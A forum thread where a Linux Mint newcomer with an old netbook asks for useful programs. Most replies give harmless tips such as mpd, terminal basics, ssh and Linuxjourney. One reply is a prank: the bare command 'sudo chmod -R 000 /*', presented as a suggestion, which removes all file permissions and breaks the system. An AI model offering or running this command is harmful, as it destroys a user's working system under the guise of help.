Linux suggestions

Recently in one of my classes we had to work on Linux specifically Linux mint. Never having use this platform before I was curious and decided to go buy a cheap hard drive and a $40  craptop from Goodwill so I can use it to familiarize myself. The way it is set up was very comfortable and I was able to find most things with ease however I haven't really done much more than use it for homework because it's smaller and easier to transport than my normal laptop. I also used it to stream steam from my main PC to a projector in the bedroom to play Skyrim. What are some interesting programs or uses I should look into? keep in mind the limitation of this being a roughly 10 year old netbook.

Try mpd for your music, it's quite a different experience from "regular" media players.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Learn to use the terminal. Primarily, APT (assuming you installed mint), GNU Coreutils, etc. Also look into ssh, you can use it to control your PCs remotely if you know the terminal. Linuxjourney is a good resource for learning Linux as well. I use Linux as my primary OS, so you can ask me more if you're looking for info.

I use Arch